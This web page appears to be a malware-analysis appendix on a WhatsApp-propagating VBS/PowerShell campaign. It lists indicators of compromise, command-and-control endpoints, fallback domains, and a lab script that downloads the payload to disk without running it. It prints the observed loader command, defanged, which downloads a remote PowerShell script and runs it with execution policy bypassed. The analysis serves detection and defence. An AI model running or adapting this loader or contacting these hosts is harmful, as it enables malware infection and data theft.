Loading...
You are here:  Home  >  Uncategorized  >  Current Article

WhatsApp_VBS_PowerShell

By   /  October 13, 2025  /  Comments Off on WhatsApp_VBS_PowerShell

    Print       Email

Appendix B — PowerShell Snippets (Defanged)

Observed Malicious Loader Command (Do NOT Execute)
—————————————————————-
powershell.exe -ep bypass “[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString(‘https://miportuarios[.]com/sisti/api.ps1’))”

IMAP Bootstrap (Mailbox as Config Channel)
—————————————————————-
# Opens TLS IMAP to imap.terra.com.br:993, logs in, searches subject “data”, fetches latest body.
# Shown here for analysis context only; do NOT run in production.
# (The original script uses TcpClient + SslStream and raw IMAP commands: LOGIN/SELECT/SEARCH/FETCH.)

Related Backend Endpoints (Same Infrastructure)
—————————————————————-
miportuarios[.]com/sisti/api.php
miportuarios[.]com/sisti/log.php
miportuarios[.]com/sisti/config.php
miportuarios[.]com/sisti/contacts.php

WhatsApp Automation Indicators (Related PS sample)
—————————————————————-
– Downloads WPPConnect JS from: github[.]com/wppconnect-team/wa-js/…/wppconnect-wa.js
– Copies Chrome profile to: C:\temp\ChromeWpp
– Drops ChromeDriver to: C:\temp\chromedriver.exe
– Interacts with: https://web.whatsapp[.]com/

Lab‑Only, Capture‑Only Retrieval Harness (Safe Alternative)
—————————————————————-
# Purpose: capture bytes without execution; include PT‑BR headers and cookie seeding via /data.php.
# Replace OUTFILE as needed. Do NOT include this in automated allowlists.

$ErrorActionPreference = ‘Stop’
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$h = @{
‘User-Agent’ = ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0’
‘Accept’ = ‘*/*’
‘Accept-Language’ = ‘pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7’
}
$s = New-Object Microsoft.PowerShell.Commands.WebRequestSession

# Seed cookie (fallback path from the VBS)
Invoke-WebRequest ‘https://lefthandsuperstructures[.]com/data.php’ -Headers $h -WebSession $s -UseBasicParsing | Out-Null

# Fetch gated PS1 (no IEX; write to disk)
$out = ‘C:\Temp\api.ps1’
Invoke-WebRequest ‘https://miportuarios[.]com/sisti/api.ps1’ `
-Headers ($h + @{ ‘Referer’=’https://lefthandsuperstructures[.]com/data.php’ }) `
-WebSession $s -UseBasicParsing -MaximumRedirection 10 `
-OutFile $out -Verbose

Get-Item $out | Select FullName,Length,LastWriteTime
Get-FileHash $out -Algorithm SHA256

—————————————————————-
IMAP: imap.terra.com.br:993
Fallback: lefthandsuperstructures[.]com, clhttradinglimited[.]com, mazdafinancialsevrices[.]com,
ricardasphotography[.]com, jornalistaaurelianoborgesmidia[.]com, cursosgratiss[.]com[.]br,
intelligentopennetworkingawards[.]com, vinhomeshungyentheempires[.]com, wbdiamonds[.]com,
pastebin[.]com/raw/SmCz4cp8
Panel: miportuarios[.]com/sisti/{api.php,config.php,log.php,contacts.php}
Other: api.ipify[.]org, cld[.]pt/dl/…/Orcamento…zip

    Print       Email
  • Published: 4 months ago on October 13, 2025
  • By:
  • Last Modified: October 13, 2025 @ 10:51 pm
  • Filed Under: Uncategorized

You might also like...

WhatApp_PowerShell_VBS-S2

Read More →